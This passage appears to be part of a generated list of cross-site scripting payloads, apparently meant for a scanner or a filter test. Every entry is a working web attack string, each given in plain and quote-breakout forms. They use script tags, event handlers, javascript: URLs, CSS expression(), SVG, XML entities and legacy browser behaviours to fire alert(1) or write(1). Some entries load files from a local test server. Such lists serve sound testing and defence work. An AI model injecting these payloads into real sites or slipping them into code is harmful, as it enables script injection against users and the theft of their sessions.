poster=javascript:alert(1)//></video>', "'><video poster=javascript:alert(1)//></video>", '"><video poster=javascript:alert(1)//<video poster=javascript:alert(1)//></video>', '"><video poster=javascript:alert(1)//></video>', "'><video poster=javascript:alert(1)//></video>", "'><video poster=javascript:alert(1)//<video poster=javascript:alert(1)//></video>", '"><video poster=javascript:alert(1)//></video>', "'><video poster=javascript:alert(1)//></video>", '<head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>', '"><head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>', '\'><head><base href="javascript://"/></head><body><a href="/. /,alert(1)//#">XXX</a></body>', '<SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>', '"><SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>', "'><SCRIPT FOR=document EVENT=onreadystatechange>alert(1)</SCRIPT>", '<OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>', '"><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>', '\'><OBJECT CLASSID="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83"><PARAM NAME="DataURL" VALUE="javascript:alert(1)"></OBJECT>', '<embed src="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></embed>', '"><embed src="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></embed>', '\'><embed src="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg=="></embed>', '<form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>', '"><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>', '\'><form id="test"></form><button form="test" formaction="javascript:alert(1)">X</button>', '<b <script>alert(1)//</script>0</script></b>', '"><b <script>alert(1)//</script>0</script></b>', "'><b <script>alert(1)//</script>0</script></b>", '<script src="javascript:alert(1)">', '"><script src="javascript:alert(1)">', '\'><script src="javascript:alert(1)">', '<image src="javascript:alert(1)">', '"><image src="javascript:alert(1)">', '\'><image src="javascript:alert(1)">', '<div style=width:1px;filter:glow onfilterchange=alert(1)>x', '"><div style=width:1px;filter:glow onfilterchange=alert(1)>x', "'><div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>", '"><div style=width:1px;filter:glow onfilterchange=alert(1)>x', '"><div style=width:1px;filter:glow onfilterchange=alert(1)>x', "'><div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>", "'><div style=width:1px;filter:glow onfilterchange=alert(1)>x", '"><div style=width:1px;filter:glow onfilterchange=alert(1)>x', "'><div style=width:1px;filter:glow onfilterchange=alert(1)>x</div>", '<? foo="><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>">', '<! foo="><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>">', '</ foo="><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>">', '<? foo="><x foo=\'?><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>\'>">', '<! foo="[[[Inception]]"><x foo="]foo><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>">', '<% foo><x foo="%><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>">', '<iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/X.html!X.html></iframe>', '"><iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/X.html!X.html></iframe>', "'><iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/X.html!X.html></iframe>", '<iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/X.gif!X.html></iframe>', '"><iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/X.gif!X.html></iframe>', "'><iframe src=mhtml:http://127.0.0.1:3555/xss_serve_payloads/X.gif!X.html></iframe>", '<div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>', '"><div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>', '\'><div id=d><x xmlns="><iframe onload=alert(1)"></div> <script>d.innerHTML=d.innerHTML</script>', '<img[a][b]src=x[d]onerror[c]=[e]"alert(1)">', '"><img[a][b]src=x[d]onerror[c]=[e]"alert(1)">', '\'><img[a][b]src=x[d]onerror[c]=[e]"alert(1)">', '<a href="[a]java[b]script[c]:alert(1)">XXX</a>', '"><a href="[a]java[b]script[c]:alert(1)">XXX</a>', '\'><a href="[a]java[b]script[c]:alert(1)">XXX</a>', '<img src="x` `<script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script>"` `>', '<img src onerror /" \'"= alt=alert(1)//">', '"><img src onerror /" \'"= alt=alert(1)//">', '\'><img src onerror /" \'"= alt=alert(1)//">', '<title onpropertychange=alert(1)></title><title title=></title>', '"><title onpropertychange=alert(1)></title><title title=></title>', "'><title onpropertychange=alert(1)></title><title title=></title>", '<a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=alert(1)></a>">', '"><a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=alert(1)></a>">', '\'><a href=http://foo.bar/#x=`y></a><img alt="`><img src=x:x onerror=alert(1)></a>">', '<!a foo=x=`y><img alt="`><img src=x:x onerror=alert(2)//">', '"><!a foo=x=`y><img alt="`><img src=x:x onerror=alert(2)//">', '\'><!a foo=x=`y><img alt="`><img src=x:x onerror=alert(2)//">', '<?a foo=x=`y><img alt="`><img src=x:x onerror=alert(3)//">', '"><?a foo=x=`y><img alt="`><img src=x:x onerror=alert(3)//">', '\'><?a foo=x=`y><img alt="`><img src=x:x onerror=alert(3)//">', '<!--[if]><script>alert(1)</script -->', '"><!--[if]><script>alert(1)</script -->', "'><!--[if]><script>alert(1)</script -->", '<!--[if<img src=x onerror=alert(2)//]> -->', '"><!--[if<img src=x onerror=alert(2)//]> -->', "'><!--[if<img src=x onerror=alert(2)//]> -->", '<!-- `<img/src=xx:xx onerror=alert(1)//--!>', '"><!-- `<img/src=xx:xx onerror=alert(1)//--!>', "'><!-- `<img/src=xx:xx onerror=alert(1)//--!>", "<xmp> <% </xmp> <img alt='%></xmp><img src=xx:x onerror=alert(1)//'> <script> x='<%' </script> %>/ alert(2) </script> XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>", '"><xmp> <% </xmp> <img alt=\'%></xmp><img src=xx:x onerror=alert(1)//\'> <script> x=\'<%\' </script> %>/ alert(2) </script> XXX <style> *[\'<!--\']{} </style> -->{} *{color:red}</style>', "'><xmp> <% </xmp> <img alt='%></xmp><img src=xx:x onerror=alert(1)//'> <script> x='<%' </script> %>/ alert(2) </script> XXX <style> *['<!--']{} </style> -->{} *{color:red}</style>", '<frameset onload=alert(1)>', '"><frameset onload=alert(1)>', "'><frameset onload=alert(1)>", '<table background="javascript:alert(1)"></table>', '"><table background="javascript:alert(1)"></table>', '\'><table background="javascript:alert(1)"></table>', '<!--<img src="--><img src=x onerror=alert(1)//">', '"><!--<img src="--><img src=x onerror=alert(1)//">', '\'><!--<img src="--><img src=x onerror=alert(1)//">', '<comment><img src="</comment><img src=x onerror=alert(1))//">', '"><comment><img src="</comment><img src=x onerror=alert(1))//">', '\'><comment><img src="</comment><img src=x onerror=alert(1))//">', '<svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>', '"><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>', '\'><svg><![CDATA[><image xlink:href="]]><img src=xx:x onerror=alert(2)//"></svg>', '<style><img src="</style><img src=x onerror=alert(1)//">', '"><style><img src="</style><img src=x onerror=alert(1)//">', '\'><style><img src="</style><img src=x onerror=alert(1)//">', '<li style=list-style:url() onerror=alert(1)></li>', '"><li style=list-style:url() onerror=alert(1)></li>', "'><li style=list-style:url() onerror=alert(1)></li>", '<div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>', '"><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>', "'><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>", '"><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>', '"><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>', "'><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>", "'><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>", '"><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)>', "'><div style=content:url(data:image/svg+xml,%3Csvg/%3E);visibility:hidden onload=alert(1)></div>", '<a style="-o-link:\'javascript:alert(1)\';-o-link-source:current">X</a>', '"><a style="-o-link:\'javascript:alert(1)\';-o-link-source:current">X</a>', '\'><a style="-o-link:\'javascript:alert(1)\';-o-link-source:current">X</a>', "<style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>", '"><style>p[foo=bar{}*{-o-link:\'javascript:alert(1)\'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>', "'><style>p[foo=bar{}*{-o-link:'javascript:alert(1)'}{}*{-o-link-source:current}*{background:red}]{background:green};</style>", '<link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d', '"><link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d', "'><link rel=stylesheet href=data:,*%7bx:expression(write(1))%7d", '<style>@import "data:,*%7bx:expression(write(1))%7D";</style>', '"><style>@import "data:,*%7bx:expression(write(1))%7D";</style>', '\'><style>@import "data:,*%7bx:expression(write(1))%7D";</style>', '<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>', '"><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>', '\'><a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="alert(1);">XXX</a></a><a href="javascript:alert(2)">XXX</a>', "<style>*[{}@import'test.css?]{color: green;}</style>X", '"><style>*[{}@import\'test.css?]{color: green;}</style>X', "'><style>*[{}@import'test.css?]{color: green;}</style>X", "* {-o-link:'javascript:alert(1)';-o-link-source: current;}", '<div style="font-family:\'foo[a];color:red;\';">XXX</div>', '"><div style="font-family:\'foo[a];color:red;\';">XXX</div>', '\'><div style="font-family:\'foo[a];color:red;\';">XXX</div>', '<div style="font-family:foo}color=red;">X', '"><div style="font-family:foo}color=red;">X', '\'><div style="font-family:foo}color=red;">XXX</div>', '"><div style="font-family:foo}color=red;">X', '"><div style="font-family:foo}color=red;">X', '\'><div style="font-family:foo}color=red;">XXX</div>', '\'><div style="font-family:foo}color=red;">X', '"><div style="font-family:foo}color=red;">X', '\'><div style="font-family:foo}color=red;">XXX</div>', '<div style="[a]color[b]:[c]red">XXX</div>', '"><div style="[a]color[b]:[c]red">XXX</div>', '\'><div style="[a]color[b]:[c]red">XXX</div>', '<div style="\\63&#9\\06f&#10\\0006c&#12\\00006F&#13\\R:\\000072 Ed;color\\0\\bla:yellow\\0\\bla;col\\0\\00 \\&#xA0or:blue;">XXX</div>', '"><div style="\\63&#9\\06f&#10\\0006c&#12\\00006F&#13\\R:\\000072 Ed;color\\0\\bla:yellow\\0\\bla;col\\0\\00 \\&#xA0or:blue;">XXX</div>', '\'><div style="\\63&#9\\06f&#10\\0006c&#12\\00006F&#13\\R:\\000072 Ed;color\\0\\bla:yellow\\0\\bla;col\\0\\00 \\&#xA0or:blue;">XXX</div>', '<// style=x:expression\\28write(1)\\29>', '"><// style=x:expression\\28write(1)\\29>', "'><// style=x:expression\\28write(1)\\29>", '<style>*{x:expression(write(1))}</style>', '"><style>*{x:expression(write(1))}</style>', "'><style>*{x:expression(write(1))}</style>", '<div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>', '"><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>', '\'><div style="background:url(http://foo.f/f oo/;color:red/*/foo.jpg);">X</div>', '<div style="list-style:url(http://foo.f)\\20url(javascript:alert(1));">X</div>', '"><div style="list-style:url(http://foo.f)\\20url(javascript:alert(1));">X</div>', '\'><div style="list-style:url(http://foo.f)\\20url(javascript:alert(1));">X</div>', '<div id=d><div style="font-family:\'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B\'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>', '"><div id=d><div style="font-family:\'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B\'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>', '\'><div id=d><div style="font-family:\'sans\\27\\2F\\2A\\22\\2A\\2F\\3B color\\3Ared\\3B\'">X</div></div> <script>with(document.getElementById("d"))innerHTML=innerHTML</script>', '<div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>', '"><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>', '\'><div style="background:url(/f#[a]oo/;color:red/*/foo.jpg);">X</div>', '<div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X', '"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X', '\'><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>', '"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X', '"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X', '\'><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>', '\'><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X', '"><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X', '\'><div style="font-family:foo{bar;background:url(http://foo.f/oo};color:red/*/foo.jpg);">X</div>', '<x style="background:url(\'x[a];color:red;/*\')">XXX</x>', '"><x style="background:url(\'x[a];color:red;/*\')">XXX</x>', '\'><x style="background:url(\'x[a];color:red;/*\')">XXX</x>', '<script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>', '</ScrIpt><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>', '"><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>', '</ScrIpt><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>', "'><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>", '</ScrIpt><script>({set/**/$($){_/**/setter=$,_=1}}).$=alert</script>', '<script>({0:#0=alert/#0#/#0#(1)})</script>', '</ScrIpt><script>({0:#0=alert/#0#/#0#(1)})</script>', '"><script>({0:#0=alert/#0#/#0#(1)})</script>', '</ScrIpt><script>({0:#0=alert/#0#/#0#(1)})</script>', "'><script>({0:#0=alert/#0#/#0#(1)})</script>", '</ScrIpt><script>({0:#0=alert/#0#/#0#(1)})</script>', "<script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>", "</ScrIpt><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>", '"><script>ReferenceError.prototype.__defineGetter__(\'name\', function(){alert(1)}),x</script>', "</ScrIpt><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>", "'><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>", "</ScrIpt><script>ReferenceError.prototype.__defineGetter__('name', function(){alert(1)}),x</script>", "<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>", "</ScrIpt><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>", '"><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._(\'alert(1)\')()</script>', "</ScrIpt><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>", "'><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>", "</ScrIpt><script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('alert(1)')()</script>", "<script>history.pushState(0,0,'/i/am/somewhere_else');</script>", "</ScrIpt><script>history.pushState(0,0,'/i/am/somewhere_else');</script>", '"><script>history.pushState(0,0,\'/i/am/somewhere_else\');</script>', "</ScrIpt><script>history.pushState(0,0,'/i/am/somewhere_else');</script>", "'><script>history.pushState(0,0,'/i/am/somewhere_else');</script>", "</ScrIpt><script>history.pushState(0,0,'/i/am/somewhere_else');</script>", '<script src="#">{alert(1)}</script>;1', '"><script src="#">{alert(1)}</script>;1', '\'><script src="#">{alert(1)}</script>;1', '+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),alert(RegExp.input);', '<b><script<b></b><alert(1)</script </b></b>', '"><b><script<b></b><alert(1)</script </b></b>', "'><b><script<b></b><alert(1)</script </b></b>", '<script<{alert(1)}/></script </>', '"><script<{alert(1)}/></script </>', "'><script<{alert(1)}/></script </>", '0?<script>Worker("#").onmessage=function(_)eval(_.data)</script> :postMessage(importScripts(\'data:;base64,cG9zdE1lc3NhZ2UoJ2FsZXJ0KDEpJyk\'))', "<script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>", "</ScrIpt><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>", '"><script>crypto.generateCRMFRequest(\'CN=0\',0,0,null,\'alert(1)\',384,null,\'rsa-dual-use\')</script>', "</ScrIpt><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>", "'><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>", "</ScrIpt><script>crypto.generateCRMFRequest('CN=0',0,0,null,'alert(1)',384,null,'rsa-dual-use')</script>", "<script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>", "</ScrIpt><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>", '"><script>[{\'a\':Object.prototype.__defineSetter__(\'b\',function(){alert(arguments[0])}),\'b\':[\'secret\']}]</script>', "</ScrIpt><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>", "'><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>", "</ScrIpt><script>[{'a':Object.prototype.__defineSetter__('b',function(){alert(arguments[0])}),'b':['secret']}]</script>", '<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg', '"><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg', '\'><svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:alert(1)"></g></svg', '<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', '"><script>alert(1)</script>', '</ScrIpt><script>alert(1)</script>', "'><script>alert(1)</script>", '</ScrIpt><script>alert(1)</script></svg>', '<svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>', '"><svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>', '\'><svg onload="javascript:alert(1)" xmlns="http://www.w3.org/2000/svg"></svg>', '<iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>', '"><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>', '\'><iframe src="data:image/svg-xml,%1F%8B%08%00%00%00%00%00%02%03%B3)N.%CA%2C(Q%A8%C8%CD%C9%2B%B6U%CA())%B0%D2%D7%2F%2F%2F%D7%2B7%D6%CB%2FJ%D77%B4%B4%B4%D4%AF%C8(%C9%CDQ%B2K%CCI-*%D10%D4%B4%D1%87%E8%B2%03"></iframe>', '<svg><style>&lt;img/src=x onerror=alert(1)// </b>', '"><svg><style>&lt;img/src=x onerror=alert(1)// </b>', "'><svg><style>&lt;img/src=x onerror=alert(1)// </b>", '<?xml-stylesheet href="javascript:alert(1)"?><root/>', '"><?xml-stylesheet href="javascript:alert(1)"?><root/>', '\'><?xml-stylesheet href="javascript:alert(1)"?><root/>', '<script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>', '"><script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>', '\'><script xmlns="http://www.w3.org/1999/xhtml">&#x61;l&#x65;rt&#40;1)</script>', '<!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/X.html">]><y>&x;</y>', '"><!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/X.html">]><y>&x;</y>', '\'><!DOCTYPE x[<!ENTITY x SYSTEM "http://127.0.0.1:3555/xss_serve_payloads/X.html">]><y>&x;</y>', '<script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>', '"><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>', '\'><script xmlns="http://www.w3.org/1999/xhtml">alert(1)</script>', '<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>', '"><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>', '\'><?xml-stylesheet type="text/css" href="data:,*%7bx:expression(write(2));%7d"?>', '<?xml-stylesheet type="text/xsl" href="#" ?> <stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> <template match="/"> <eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(1)</eval> <if expr="new ActiveXObject(\'htmlfile\').parentWindow.alert(2)"></if> </template> </stylesheet>', '"><?xml-stylesheet type="text/xsl" href="#" ?> <stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> <template match="/"> <eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(1)</eval> <if expr="new ActiveXObject(\'htmlfile\').parentWindow.alert(2)"></if> </template> </stylesheet>', '\'><?xml-stylesheet type="text/xsl" href="#" ?> <stylesheet xmlns="http://www.w3.org/TR/WD-xsl"> <template match="/"> <eval>new ActiveXObject(&apos;htmlfile&apos;).parentWindow.alert(1)</eval> <if expr="new ActiveXObject(\'htmlfile\').parentWindow.alert(2)"></if> </template> </stylesheet>', '<!ENTITY x "&#x3C;html:img&#x20;src=\'x\'&#x20;xmlns:html=\'http://www.w3.org/1999/xhtml\'&#x20;onerror=\'alert(1)\'/&#x3E;">', '"><!ENTITY x "&#x3C;html:img&#x20;src=\'x\'&#x20;xmlns:html=\'http://www.w3.org/1999/xhtml\'&#x20;onerror=\'alert(1)\'/&#x3E;">', '\'><!ENTITY x "&#x3C;html:img&#x20;src=\'x\'&#x20;xmlns:html=\'http://www.w3.org/1999/xhtml\'&#x20;onerror=\'alert(1)\'/&#x3E;">', 'X<x style=`behavior:url(#default#time2)` onbegin=`write(1)` >', '1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=alert(1)&gt;`>', '1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=alert(1)&gt;>', '1<vmlframe xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute;width:100%;height:100% src=test.vml#X></vmlframe>', '<xml> <rect style="height:100%;width:100%" id="X" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>', '"><xml> <rect style="height:100%;width:100%" id="X" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>', '\'><xml> <rect style="height:100%;width:100%" id="X" onmouseover="alert(1)" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>', '1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:alert(1) strokecolor=white strokeweight=1000px from=0 to=1000 /></a>', '<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>', '"><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>', '\'><a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XXX</a>', '<x style="behavior:url(test.sct)">', '"><x style="behavior:url(test.sct)">', '\'><x style="behavior:url(test.sct)">', '<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS><SCRIPT Language="javascript">alert(1)</SCRIPT></SCRIPTLET>', '"><SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS><SCRIPT Language="javascript">alert(1)</SCRIPT></SCRIPTLET>', '\'><SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS><SCRIPT Language="javascript">alert(1)</SCRIPT></SCRIPTLET>', '<xml id="X" src="test.htc"></xml><label dataformatas="html" datasrc="#X" datafld="payload"></label>', '"><xml id="X" src="test.htc"></xml><label dataformatas="html" datasrc="#X" datafld="payload"></label>', '\'><xml id="X" src="test.htc"></xml><label dataformatas="html" datasrc="#X" datafld="payload"></label>', '<?xml version="1.0"?> x><payload><![CDATA[<img src=x onerror=alert(1)>]]></payload></x>', '"><?xml version="1.0"?> x><payload><![CDATA[<img src=x onerror=alert(1)>]]></payload></x>', '\'><?xml version="1.0"?> x><payload><![CDATA[<img src=x onerror=alert(1)>]]></payload></x>', '<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>', '"><?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>', '\'><?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>', 'object id="x" classid="clsid:CB927D12-4FF7-4a9e-A169-56E4B8A75598"></object> <object classid="clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B" onqt_error="alert(1)" style="behavior:url(#x);"><param name=postdomevents /></object>', 'class X {public static function main() { flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||"javascript:alert(1)"),flash.Lib._root.name||"_top"); }}', '<div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>', '"><div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>', '\'><div id="div1"><input value="``onmouseover=alert(1)"></div> <div id="div2"></div><script>document.getElementById("div2").innerHTML = document.getElementById("div1").innerHTML;</script>', '<body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>', '"><body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>', "'><body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>", 'X<form id=test onforminput=javascript:alert(1)><input></form>', 'X<form id=test><input></form><button form=test onformchange==javascript:alert(1)>X', '<input onblur=write(1) autofocus><input autofocus>', '"><input onblur=write(1) autofocus><input autofocus>', "'><input onblur=write(1) autofocus><input autofocus>", '<video onerror="javascript:alert(1)"><source>', '"><video onerror="javascript:alert(1)"><source>', '\'><video onerror="javascript:alert(1)"><source>', '<q/oncut=open()>', '"><q/oncut=open()>', "'><q/oncut=open()>", '<marquee<marquee/onstart=confirm(1)>', '"><marquee/onstart=confirm(1)>', "'><marquee/onstart=confirm(1)>/onstart=confirm(1)>", '<body language=vbsonload=alert-1', '"><body language=vbsonload=alert-1', "'><body language=vbsonload=alert-1", '<command 